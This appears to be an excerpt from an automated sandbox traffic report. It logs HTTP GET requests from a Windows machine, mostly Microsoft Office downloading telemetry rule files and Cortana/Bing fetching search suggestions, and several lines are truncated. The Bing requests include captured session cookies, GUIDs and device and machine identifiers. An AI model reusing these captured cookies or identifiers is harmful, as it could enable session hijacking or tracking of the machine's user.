                                  Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initorigin: https://www.bing.comaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307; SRCHHPGUSR=IPMH=402439e4&IPMID=1741339336144&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Init HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=19FF0D34A8246FAD33EA189CA9E56EAD&CBV=54277149&CPID=1741339336683&AC=1&CPH=01beaa36; _EDGE_S=SID=128F177EAEC96EC83CF802D6AFDF6F95&mkt=de-ch; SRCHUID=V=2&GUID=79A4A21CD5314D11975C5022FA7E18FB&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307; SRCHHPGUSR=IPMH=c1a41935&IPMID=1741339336683&SRCHLANG=de&LUT=1741339335365; CortanaAppUID=99325A50A46066F842A6B684698F464A; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                  Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=k&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=1c3f91108ddc400280290f3dcf1c3f62&ig=c16bccd06c08419ab579eb9d479800f7 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-s
                                  Source: global trafficHTTP traffic detected: GET /PPRelatedSearch?query=Classic_%7B725be8f7-668e-4c7b-8f90-46bdb0936430%7D&lang=en-CH HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-en
                                  Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=ke&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=1c3f91108ddc400280290f3dcf1c3f62&ig=765b10655e7e40cbb2ceb3b8d696ff0e HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-
                                  Source: global trafficHTTP traffic detected: GET /PPRelatedSearch?query=Classic_%7B725be8f7-668e-4c7b-8f90-46bdb0936430%7D&lang=en-CH HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-en
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=key&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=1c3f91108ddc400280290f3dcf1c3f62&ig=e536722ae7aa4c4fabfce29204700ecd HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: 